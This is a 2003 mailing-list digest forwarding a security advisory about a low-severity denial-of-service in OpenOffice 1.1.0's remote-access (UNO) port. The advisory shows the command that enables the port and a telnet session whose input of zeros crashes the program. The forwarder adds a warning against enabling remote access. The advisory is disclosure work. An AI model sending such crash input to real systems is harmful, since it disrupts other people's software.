[No patches for this OpenOffice 1.1 vulnerability yet. Do not enable remote access if you're using OO in a potentially hostile environment -- Raju]
This is an RFC 1153 digest. (1 message) ---------------------------------------------------------------------- Message-ID: <[EMAIL PROTECTED]> From: Marc Schoenefeld <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: Openoffice 1.1.0 DoS Date: Wed, 8 Oct 2003 13:15:10 +0200 (MES) ================================ Illegalaccess.org Security Alert ================================ Date : 08/10/2003 Application : Openoffice Version : 1.1.0 Website : http://www.Openoffice.org Problems : Desktop Denial-Of-Service Severity : Low Contributor : Marc Schoenefeld, [EMAIL PROTECTED] When enabling remote access (UNO) to OpenOffice, it opens a port (default 8100). This is done typically with the following command: C:\Programme\oo1.1.0\program> soffice "-accept=socket,host=<ip>,port=8100;urp;" where <ip> states the listening address When issuing the commands listed below, Openoffice crashes and prompts the error reporting box. =================================================================== C:\Dokumente und Einstellungen\User>telnet 127.0.0.1 8100 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. 0 0 0 0 0 0 0 0 0 0 0 0 =================================================================== -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Sch�nefeld Dipl. Wirtsch.-Inf. / Software Developer ------------------------------ End of this Digest ****************** -- Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F It is the mind that moves ------------------------------------------------------- This SF.net email is sponsored by: SF.net Giveback Program. SourceForge.net hosts over 70,000 Open Source Projects. See the people who have HELPED US provide better services: Click here: http://sourceforge.net/supporters.php _______________________________________________ linux-india-help mailing list [EMAIL PROTECTED] https://lists.sourceforge.net/lists/listinfo/linux-india-help
